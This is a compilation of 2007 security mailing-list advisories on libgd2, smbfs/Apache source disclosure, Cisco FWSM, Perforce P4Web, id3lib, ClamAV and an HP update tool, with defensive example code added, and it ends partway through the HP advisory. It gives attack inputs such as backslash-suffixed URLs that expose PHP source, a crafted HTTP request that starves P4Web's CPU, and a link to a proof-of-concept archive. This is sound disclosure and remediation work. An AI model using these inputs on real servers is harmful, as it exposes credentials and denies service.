==========================================================
Ubuntu Security Notice USN-557-1            December 18, 2007
libgd2 vulnerability
CVE-2007-3996
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libgd2-noxpm 2.0.33-2ubuntu5.3
libgd2-xpm 2.0.33-2ubuntu5.3
Ubuntu 6.10:
libgd2-noxpm 2.0.33-4ubuntu2.2
libgd2-xpm 2.0.33-4ubuntu2.2
Ubuntu 7.04:
libgd2-noxpm 2.0.34~rc1-2ubuntu1.2
libgd2-xpm 2.0.34~rc1-2ubuntu1.2
Ubuntu 7.10:
libgd2-noxpm 2.0.34-1ubuntu1.1
libgd2-xpm 2.0.34-1ubuntu1.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Mattias Bengtsson and Philip Olausson discovered that the GD
library did not properly perform bounds checking when creating
images. An attacker could send specially crafted input to
applications linked against libgd2 and cause a denial of service
or possibly execute arbitrary code.
From: Maciej Gąsiorowski <gonsiore@gmail.com>
To: bugtraq <bugtraq@securityfocus.com>
Subject: smbfs and apache+php source code disclosure
Date: Wed, 19 Dec 2007 11:14:50 +0100
Because of different filename handling in POSIX and Windows there is
an issue with resolving filenames with a backslash "\" character
appended on a Windows share.
Suppose you have a Windows share mounted on a Linux box with a PHP
script on it - let's say info.php.
Executing find info.php and find info.php\\ results in the same file
- info.php (same with cat info.php\\).
When using this share to serve PHP scripts with Apache (from a Linux
box) you can use it to display PHP script content directly in your
browser.
In Apache, scripts are mapped to engines using the AddType directive
with a file extension specified. Text files with extensions not handled
by any AddType are treated as plain text.
When visiting
http://linuxbox/winshare/info.php - you get your script executed.
When visiting
http://linuxbox/winshare/info.php\ or
http://linuxbox/winshare/info.php%5C - you get your script content
displayed, revealing any details like database passwords etc.
The reason is obvious: smbfs finds the file info.php\, but Apache doesn't
have the extension php\ mapped to the PHP engine.
The same should apply to Perl scripts with mod_perl.
I don't know if this is something new; maybe it is some configuration
mistake. I have just confirmed it on a freshly installed Debian etch
box with all security updates applied, using default settings of Apache
and smbfs.
Regards
Maciej
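An added example, not from the post above: a small Python model of the decision it describes. The handler is chosen from the requested name by extension while the share resolves `info.php\` back to `info.php`, so the script body goes out as plain text; the hardened variant refuses any request whose name the filesystem canonicalised into a different one and picks the handler from the resolved name. The share prefix, file listing, handler map and the `smbfs_like_lookup` behaviour are constructed from the post's observation, not smbfs or Apache code.

```python
import posixpath
from typing import Optional, Set, Tuple
from urllib.parse import unquote

# Constructed for this example: where the mounted share is served, which files
# exist on it, and an AddType-style extension -> handler map.
SHARE_PREFIX = "/winshare/"
SHARE_FILES = {"info.php", "notes.txt"}
HANDLERS = {".php": "application/x-httpd-php", ".pl": "perl-script"}
DEFAULT_HANDLER = "text/plain"   # unmapped extensions are served verbatim

Response = Tuple[int, Optional[str], Optional[str]]   # (status, handler, file served)


def handler_for(name: str) -> str:
    """Choose a handler the way an extension-based AddType mapping does: from
    the text after the last '.'.  'info.php\\' has the extension '.php\\',
    which is mapped to nothing, so it falls through to plain text."""
    _, ext = posixpath.splitext(name)
    return HANDLERS.get(ext.lower(), DEFAULT_HANDLER)


def share_name_from_url(url_path: str) -> Optional[str]:
    """Percent-decode the request and strip the share prefix, so
    /winshare/info.php%5C becomes info.php\\ (a real backslash)."""
    path = unquote(url_path)
    if not path.startswith(SHARE_PREFIX):
        return None
    return path[len(SHARE_PREFIX):]


def smbfs_like_lookup(name: str, files: Set[str]) -> Optional[str]:
    """Model of the share's name resolution as the post observed it (constructed,
    not smbfs code): trailing backslashes are dropped, so 'info.php' and
    'info.php\\' both resolve to the same file."""
    canonical = name.rstrip("\\")
    return canonical if canonical in files else None


def serve_naive(url_path: str, files: Set[str] = SHARE_FILES) -> Response:
    """The behaviour the post describes: handler from the *requested* name,
    bytes from whatever file the share resolves that name to."""
    name = share_name_from_url(url_path)
    if name is None:
        return (404, None, None)
    resolved = smbfs_like_lookup(name, files)
    if resolved is None:
        return (404, None, None)
    return (200, handler_for(name), resolved)


def serve_hardened(url_path: str, files: Set[str] = SHARE_FILES) -> Response:
    """Refuse a request whose name the filesystem canonicalised into a different
    one, and choose the handler from the resolved name as a second line of
    defence so script bytes can never leave under the plain-text handler."""
    name = share_name_from_url(url_path)
    if name is None:
        return (404, None, None)
    resolved = smbfs_like_lookup(name, files)
    if resolved is None:
        return (404, None, None)
    if resolved != name:
        # The request did not name the file it would receive: reject it.
        return (403, None, None)
    return (200, handler_for(resolved), resolved)


if __name__ == "__main__":
    for url in ("/winshare/info.php", "/winshare/info.php\\", "/winshare/info.php%5C"):
        print(f"{url!r:30} naive={serve_naive(url)} hardened={serve_hardened(url)}")
```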
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Application Inspection Vulnerability in Cisco Firewall Services Module
Date: Wed, 19 Dec 2007 15:20:00 -0000
Message-id: <20071219.fwsm@psirt.cisco.com>
Cisco Security Advisory: Application Inspection Vulnerability in Cisco
Firewall Services Module
Advisory ID: cisco-sa-20071219-fwsm
===========
Revision 1.0
===========
Last Updated 2007 December 19 1600 UTC (GMT)
For Public Release 2007 December 19 1600 UTC (GMT)
Summary
======
A vulnerability exists in the Cisco Firewall Services Module (FWSM), a
high-speed, integrated firewall module for Cisco Catalyst 6500
switches and Cisco 7600 Series routers, that may result in a reload
of the FWSM. The only affected FWSM System Software Version is
3.2(3).
There are no known instances of intentional exploitation of this
issue. However, Cisco has observed data streams that appear to be
unintentionally triggering this vulnerability.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5584
has been assigned to this vulnerability.
Cisco will release free software updates that address this
vulnerability.
A workaround that mitigates this vulnerability is available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml
Affected Products
================
Vulnerable Products
+------------------
The FWSM is vulnerable if running System Software version 3.2(3).
To determine if the FWSM is vulnerable, issue the "show module"
command-line interface (CLI) command from Cisco IOS or Cisco CatOS
to identify what modules and sub-modules are installed in the
system.
The following example shows a system with a Firewall Service Module
(WS-SVC-FWM-1) installed in slot 4.
switch#show module
Mod Ports Card Type                              Model              Serial No.
--- ----- -------------------------------------- ----------------- -----------
  1    48 SFM-capable 48 port 10/100/1000mb RJ45 WS-X6548-GE-TX    SAxxxxxxxxx
  4     6 Firewall Module                        WS-SVC-FWM-1      SAxxxxxxxxx
  5     2 Supervisor Engine 720 (Active)         WS-SUP720-BASE    SAxxxxxxxxx
  6     2 Supervisor Engine 720 (Hot)            WS-SUP720-BASE    SAxxxxxxxxx
After locating the correct slot, issue the show module <slot number>
command to identify the software version that is running.
switch#show module 4
Mod Ports Card Type                              Model              Serial No.
--- ----- -------------------------------------- ----------------- -----------
  4     6 Firewall Module                        WS-SVC-FWM-1      SAxxxxxxxxx
Mod MAC addresses                       Hw     Fw           Sw           Status
--- --------------------------------- ------ ------------ ------------ -------
  4 0003.e4xx.xxxx to 0003.e4xx.xxxx  3.0    7.2(1)       3.2(3)       Ok
The preceding example shows that the FWSM is running version 3.2(3)
as indicated by the column under "Sw" above.
Note: Recent versions of Cisco IOS will show the software version of
each module in the output from the show module command; therefore,
executing the show module <slot number> command is not necessary.
Alternatively, the information can also be obtained directly from the
FWSM through the show version command as seen in the following
example.
FWSM#show version
FWSM Firewall Version 3.2(3)
Customers who use the Cisco Adaptive Security Device Manager (ASDM)
to manage their devices can find the version of the software displayed
in the table in the login window or in the upper left corner of the
ASDM window. The version notation is similar to the following example.
FWSM Version: 3.2(3)
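An added example, not Cisco's code: a Python helper that applies the check above to captured CLI output. It finds WS-SVC-FWM-1 slots in "show module" output, reads their "Sw" column and flags the one affected release, and also extracts the version from the "show version" and ASDM notations. The sample output is the advisory's own example embedded as a string; the parser splits rows on whitespace, so column alignment does not matter.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The advisory names exactly one affected release and one module model.
AFFECTED_FWSM_VERSIONS = {"3.2(3)"}
FWSM_MODEL = "WS-SVC-FWM-1"


@dataclass
class FwsmModule:
    slot: int
    model: str
    sw: str            # the "Sw" column; "unknown" if no Sw table covered this slot

    def affected(self) -> bool:
        return self.sw in AFFECTED_FWSM_VERSIONS


def parse_show_module(output: str) -> List[FwsmModule]:
    """Return every FWSM slot seen in 'show module' output with its Sw version.

    In the 'Mod Ports Card Type Model Serial No.' table the model is the
    second-last token of a row; in the 'Mod MAC addresses Hw Fw Sw Status'
    table the Sw version is the second-last token.  Header rows start with
    'Mod' and tell us which table the following rows belong to."""
    models: Dict[int, str] = {}
    versions: Dict[int, str] = {}
    table = None
    for line in output.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if tokens[0] == "Mod":
            table = "sw" if "Sw" in tokens else "model" if "Model" in tokens else None
            continue
        if table is None or not tokens[0].isdigit():
            continue                      # prompts, '---' separators, other text
        slot = int(tokens[0])
        if table == "model" and len(tokens) >= 4:
            models[slot] = tokens[-2]
        elif table == "sw" and len(tokens) >= 6:
            versions[slot] = tokens[-2]
    return [FwsmModule(slot, model, versions.get(slot, "unknown"))
            for slot, model in sorted(models.items()) if model == FWSM_MODEL]


# Matches both 'FWSM Firewall Version 3.2(3)' (show version) and
# 'FWSM Version: 3.2(3)' (ASDM login window).
_VERSION_RE = re.compile(r"FWSM (?:Firewall )?Version:? (\S+)")


def fwsm_version_from_banner(text: str) -> Optional[str]:
    match = _VERSION_RE.search(text)
    return match.group(1) if match else None


# Taken from the advisory's example; serial numbers and MACs are its placeholders.
SAMPLE_SHOW_MODULE = """\
switch#show module
Mod Ports Card Type                              Model              Serial No.
--- ----- -------------------------------------- ----------------- -----------
  1    48 SFM-capable 48 port 10/100/1000mb RJ45 WS-X6548-GE-TX    SAxxxxxxxxx
  4     6 Firewall Module                        WS-SVC-FWM-1      SAxxxxxxxxx
  5     2 Supervisor Engine 720 (Active)         WS-SUP720-BASE    SAxxxxxxxxx
  6     2 Supervisor Engine 720 (Hot)            WS-SUP720-BASE    SAxxxxxxxxx
switch#show module 4
Mod Ports Card Type                              Model              Serial No.
--- ----- -------------------------------------- ----------------- -----------
  4     6 Firewall Module                        WS-SVC-FWM-1      SAxxxxxxxxx
Mod MAC addresses                       Hw     Fw           Sw           Status
--- --------------------------------- ------ ------------ ------------ -------
  4 0003.e4xx.xxxx to 0003.e4xx.xxxx  3.0    7.2(1)       3.2(3)       Ok
"""


if __name__ == "__main__":
    for mod in parse_show_module(SAMPLE_SHOW_MODULE):
        state = "AFFECTED (cisco-sa-20071219-fwsm)" if mod.affected() else "not affected"
        print(f"slot {mod.slot}: {mod.model} Sw {mod.sw} -> {state}")
    print(fwsm_version_from_banner("FWSM Firewall Version 3.2(3)"))
```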
Products Confirmed Not Vulnerable
+--------------------------------
* FWSM System Software versions 3.2(2) and earlier.
* FWSM System Software versions 3.1(x).
* FWSM System Software versions 1.x(y) and 2.x(y).
* The Cisco PIX 500 Series Security Appliance (PIX).
* The Cisco 5500 Series Adaptive Security Appliance (ASA).
No other Cisco products are currently known to be affected by this
vulnerability.
Details
======
A vulnerability exists in the processing of data in the
control-plane path with Layer 7 Application Inspections, that may
result in a reload of the FWSM. The vulnerability can be triggered
with standard network traffic, which is passed through the
Application Layer Protocol Inspection process.
The only FWSM release affected by this vulnerability is FWSM System
Software version 3.2(3).
This vulnerability is documented in Cisco bug ID CSCsl08519.
Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsl08519 - FWSM Version 3.2.3 System Software may crash with
Application Layer Protocol Inspection
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of the vulnerability may result in a reload of
the FWSM. Repeated exploitation will result in a sustained denial of
service attack.
Software Versions and Fixes
==========================
When considering software upgrades, consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
FWSM software version 3.2(4) contains the fixes for the vulnerability
described in this document and will be available for download the week
beginning 31st December 2007.
FWSM software will be available for download from the following
location on cisco.com:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-fwsm?psrtdcat20e2
Workarounds
==========
* Disable the TCP normalizing function
Disabling the TCP normalizing function in the FWSM will mitigate
this vulnerability.
The TCP normalizer performs the following action: for traffic that
passes through the control-plane path, such as packets that require
Layer 7 inspection or management traffic, the FWSM sets the maximum
number of out-of-order packets that can be queued for a TCP
connection to 2 packets. The TCP normalizer is enabled by default
and is not configurable except to enable or disable.
To disable the TCP normalizing function, use the
"no control-point tcp-normalizer" command in global configuration
mode, as shown in the following example.
FWSM# config terminal
FWSM(config)# no control-point tcp-normalizer
FWSM(config)#
FWSM#
Disabling "control-point tcp-normalizer" means that strict TCP
checks, such as detecting out-of-sequence segments and monitoring
TCP options, will not be performed on the TCP packets received on
the control plane for Layer 7 inspection in the FWSM. The feature
should be re-enabled after upgrading to a fixed version of software.
Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound by
the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at
http://www.cisco.com.
Customers using Third-party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
====================================
This issue was first discovered via internal testing at Cisco. There
are no known instances of intentional exploitation of this issue.
However, Cisco has observed data streams that appear to be
unintentionally triggering the vulnerability.
Status of This Notice: INTERIM
=============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
===============
+-----------------------------------------------------------+
| Revision 1.0 | 2007-DECEMBER-19 | Initial public release. |
+-----------------------------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
Date: 18 Dec 2007 20:14:02 -0000
Message-ID: <20071218201402.22503.qmail@securityfocus.com>
From: research@symantec.com
To: bugtraq@securityfocus.com
Subject: SYMSA-2007-015
Symantec Vulnerability Research
http://www.symantec.com/research
Security Advisory
Advisory ID: SYMSA-2007-015
Advisory Title: Perforce P4Web Denial Of Service through resource starvation
Author: Oliver Karow / Oliver_Karow@symantec.com
Release Date: 19 DEC 2007
Application: Perforce 2006.1
Platform: Win32
Severity: Remotely exploitable - Denial Of Service
Vendor status: Resolved
CVE Number: CVE-2007-6349
Reference:
http://www.securityfocus.com/bid/26806
Overview:
From wikipedia: "Perforce is a commercial Revision Control (RC)
system. It is developed by Perforce Software, Inc. and was founded
in 1995 by Christopher Seiwald. The Perforce system is based on a
client/server model with the server managing the collection of
source versions in one or more depots. The server software runs on
the Unix, Mac OS X, or Microsoft Windows operating systems.
The client provides graphical and command line tools for a large
number of operating systems. Also available is a suite of plugins
that integrate with various programming IDEs and third party
applications, such as XCode, Autodesk 3D Studio Max, Alias Maya,
Adobe Photoshop, Microsoft Office, Eclipse and Emacs.
Other features of the system include support for reporting
(i.e. notifying users when a file has changed), branching and
merging, and defect tracking."
There is a denial of service (DoS) vulnerability in the P4Web Daemon
which makes it possible to drive the system to full CPU usage by
sending a single, specially crafted HTTP request.
Details:
A single HTTP request with the Content-Length header set to a value
greater than zero but carrying no body will cause the P4Webs.exe
process to consume up to 99% of CPU time on the target system.
The attack can be executed remotely. No authentication is required
for exploitation.
Vendor Response:
Perforce has confirmed an issue with Windows-based operating
systems and P4Web versions 2006.2 and prior that can result
in the P4Web host machine becoming unusable due to excessive
CPU usage. This was discovered by our QA department in
February of 2007, and addressed in our 2007.2 release.
Recommendation:
Users concerned about this issue should upgrade to P4Web
2007.2 or later, available at no charge from:
ftp://ftp.perforce.com/perforce/r07.2/bin.ntx86/p4webinst.exe
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (
http://cve.mitre.org), which standardizes
names for security problems.
CVE-2007-6349
-------Symantec Consulting Services Advisory Information-------
For questions about this advisory, or to report an error:
cs_advisories@symantec.com
For details on Symantec's Vulnerability Reporting Policy:
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf
Consulting Services Advisory Archive:
http://www.symantec.com/research/
Consulting Services Advisory PGP Key:
http://www.symantec.com/research/Symantec_Consulting_Services_Advisories_PGP.asc
-------------Symantec Product Advisory Information-------------
To Report a Security Vulnerability in a Symantec Product:
secure@symantec.com
For general information on Symantec's Product Vulnerability
reporting and response:
http://www.symantec.com/security/
Symantec Product Advisory Archive:
http://www.symantec.com/avcenter/security/SymantecAdvisories.html
Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc
---------------------------------------------------------------
Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted
as long as it is not edited in any way unless authorized by
Symantec Consulting Services. Reprinting the whole or part of
this alert in any medium other than electronically requires
permission from cs_advisories@symantec.com.
Disclaimer
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use
of, or reliance on, this information.
Symantec, Symantec products, and Symantec Consulting Services are
registered trademarks of Symantec Corp. and/or affiliated companies
in the United States and other countries. All other registered and
unregistered trademarks represented in this document are the sole
property of their respective companies/owners.
Date: Wed, 19 Dec 2007 18:59:03 +0100
From: Luigi Auriemma <aluigi@autistici.org>
To: bugtraq@securityfocus.com, bugs@securitytracker.com,
news@securiteam.com, full-disclosure@lists.grok.org.uk,
vuln@secunia.com, packet@packetstormsecurity.org
Subject: Array overflow in id3lib (devel CVS)
Message-Id: <20071219185903.781e8817.aluigi@autistici.org>
#######################################################################
Luigi Auriemma
Application: id3lib
http://id3lib.sourceforge.net
Versions: only devel (CVS)
stable (3.8.3) is NOT affected
Platforms: Windows, *nix and Mac
Bug: array overflow
Exploitation: local
Date: 19 Dec 2007
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
==============
1) Introduction
==============
id3lib is a well-known and widely used library for handling the ID3
tags in audio files.
Currently the library is divided into two branches: stable (3.8.3,
released back in 2003) and devel (the current CVS).
Although the vulnerable instructions are present in both versions,
only devel is exploitable, because ID3v2 4.0 tags are not supported
in stable (see ID3V2_LATEST in globals.h).
#######################################################################
=====
2) Bug
=====
The problem is in the extflags array (an array of pointers), which has
a size of only one element, while extflagbytes can hold any value from
0 to 255.
So an extflagbytes value of 0 causes a crash, since the subsequent
instructions assume extflags[0] has been initialized, while higher
values make it possible to overflow this small array.
From header_tag.cpp:
void ID3_TagHeader::ParseExtended(ID3_Reader& reader)
...
  const int extflagbytes = reader.readChar(); // Number of flag bytes
  ID3_Flags* extflags[1]; // ID3V2_4_0 has 1 flag byte, extflagbytes
                          // should be equal to 1
  for (i = 0; i < extflagbytes; ++i)
  {
    extflags[i] = new ID3_Flags;                // no check that i < 1
    extflags[i]->set(reader.readChar());        // flags
  }
I have many doubts about the real exploitation of this overflow for
executing malicious code, but I can't exclude it at all.
#######################################################################
==========
3) The Code
==========
http://aluigi.org/poc/id3libexec.zip
#######################################################################
=====
4) Fix
=====
I have sent a mail to the developers, but later I read on the
project's mailing list that the development of id3lib is
practically dead.
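As an added example (not id3lib's code, and not a fix the project shipped), the following C++ shows how the extended-header parse described in section 2 can be bounds-checked: the flag-count byte is validated against the fixed capacity of the flag array before any element is written, and the syncsafe size field is checked as well. The names parse_extended_header, status_of and first_flag_of, and the byte sequences in main, are constructed for this example.

```cpp
#include <cstddef>
#include <cstdint>
#include <iostream>
#include <vector>

// Added example, not id3lib code: a bounds-checked parse of the ID3v2.4
// extended header that rejects a hostile "number of flag bytes" field
// before anything is written into the fixed-size flag array.

enum class ParseStatus { Ok, Truncated, BadSize, BadFlagCount };

struct ExtendedHeader {
    std::uint32_t size = 0;       // syncsafe size field (covers the whole extended header)
    std::uint8_t flag_bytes = 0;  // the count field as read from the stream
    std::uint8_t flags[1] = {0};  // fixed capacity, mirroring extflags[1] in id3lib
};

// ID3v2.4 defines exactly one flag byte; the array above cannot hold more.
constexpr std::size_t kMaxFlagBytes = sizeof(ExtendedHeader::flags);

// Decodes a 28-bit syncsafe integer from four bytes starting at `pos`.
// The caller guarantees four bytes are available; returns false when any
// byte has its high bit set, which a syncsafe integer never does.
static bool read_syncsafe32(const std::vector<std::uint8_t>& d, std::size_t pos,
                            std::uint32_t& out) {
    out = 0;
    for (std::size_t i = 0; i < 4; ++i) {
        if (d[pos + i] & 0x80) return false;
        out = (out << 7) | d[pos + i];
    }
    return true;
}

// Parses size, flag count and flag bytes from the start of `data`.
ParseStatus parse_extended_header(const std::vector<std::uint8_t>& data,
                                  ExtendedHeader& out) {
    if (data.size() < 4) return ParseStatus::Truncated;
    if (!read_syncsafe32(data, 0, out.size)) return ParseStatus::BadSize;
    std::size_t pos = 4;
    // Minimum is 4 (size) + 1 (count) + 1 (flag byte); it must also fit the buffer.
    if (out.size < 6 || out.size > data.size()) return ParseStatus::BadSize;
    const std::uint8_t count = data[pos++];
    // Zero would leave flags[0] uninitialised for later code; anything above
    // kMaxFlagBytes would write past the end of the array.
    if (count == 0 || count > kMaxFlagBytes) return ParseStatus::BadFlagCount;
    if (data.size() - pos < count) return ParseStatus::Truncated;
    out.flag_bytes = count;
    for (std::size_t i = 0; i < count; ++i) out.flags[i] = data[pos + i];
    return ParseStatus::Ok;
}

// Wrappers returning plain values so results can be checked directly.
ParseStatus status_of(const std::vector<std::uint8_t>& bytes) {
    ExtendedHeader h;
    return parse_extended_header(bytes, h);
}

int first_flag_of(const std::vector<std::uint8_t>& bytes) {
    ExtendedHeader h;
    return parse_extended_header(bytes, h) == ParseStatus::Ok ? h.flags[0] : -1;
}

int main() {
    // Constructed inputs: a valid header and three malformed variants.
    const std::vector<std::uint8_t> good  = {0x00, 0x00, 0x00, 0x06, 0x01, 0x30};
    const std::vector<std::uint8_t> zero  = {0x00, 0x00, 0x00, 0x06, 0x00, 0x00};
    const std::vector<std::uint8_t> large = {0x00, 0x00, 0x00, 0x06, 0xff, 0x01};
    const std::vector<std::uint8_t> cut   = {0x00, 0x00, 0x00, 0x06, 0x01};
    std::cout << "good:  " << static_cast<int>(status_of(good))  << '\n'
              << "zero:  " << static_cast<int>(status_of(zero))  << '\n'
              << "large: " << static_cast<int>(status_of(large)) << '\n'
              << "cut:   " << static_cast<int>(status_of(cut))   << '\n';
    return 0;
}
```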
#######################################################################
---
Luigi Auriemma
http://aluigi.org
Date: Wed, 19 Dec 2007 18:38:04 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20071219173804.GA4542@galadriel.inutil.org>
Subject: [SECURITY] [DSA 1435-1] New clamav packages fix several vulnerabilities
To: bugtraq@securityfocus.com
------------------------------------------------------------------------
Debian Security Advisory DSA-1435-1 security@debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
December 19, 2007
http://www.debian.org/security/faq
------------------------------------------------------------------------
Package : clamav
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2007-6335 CVE-2007-6336
Several remote vulnerabilities have been discovered in the Clam
anti-virus toolkit. The Common Vulnerabilities and Exposures project
identifies the following problems:
CVE-2007-6335
It was discovered that an integer overflow in the decompression code
for MEW archives may lead to the execution of arbitrary code.
CVE-2007-6336
It was discovered that an off-by-one in the MS-ZIP decompression
code may lead to the execution of arbitrary code.
For the stable distribution (etch), these problems have been fixed in
version 0.90.1-3etch8.
The old stable distribution (sarge) is not affected by these problems.
However, since the clamav version from Sarge can no longer process all
current Clam malware signatures, support for ClamAV in Sarge is now
discontinued. We recommend upgrading to the stable distribution or
running a backport of the stable version.
The unstable distribution (sid) will be fixed soon.
We recommend that you upgrade your clamav packages.
Upgrade instructions
--------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian 4.0 (stable)
-------------------
Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
These files will probably be moved into the stable distribution on
its next update.
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFHaVa3Xm3vHE4uyloRAkIlAJ9YeMDZX5mvNpv2rAVgcePjaUpKRQCeP9CR
tNi2ydb9KfZ7Td8mFOWk9eY=BLYc
-----END PGP SIGNATURE-----
Date: 19 Dec 2007 20:39:51 -0000
Message-ID: <20071219203951.4560.qmail@securityfocus.com>
From: porkythepig@anspi.pl
To: bugtraq@securityfocus.com
Subject: HP laptops Software Update tool vulnerability
Advisory:
/////////
There is another remotely exploitable flaw within software preinstalled on HP notebook machines. This time, the culprit is the automatic software update tool provided by the vendor. Potential exploitation may lead to loss of user files or the alteration of vital system files (e.g. the kernel), thus leaving the PC unbootable.
Overview:
/////////
The flaw is located in the software called HP Software Update, shipped with HP notebooks to support automatic software updates and critical vulnerability patching. One of the ActiveX controls deployed by default by the vendor contains an insecure method that gives a potential attacker arbitrary file write access on the remote system.
Impact:
///////
Remote corruption of user file contents
Remote damage to system kernel files / operating system DoS condition
Attack vectors:
///////////////
There are two main attack vector schemes:
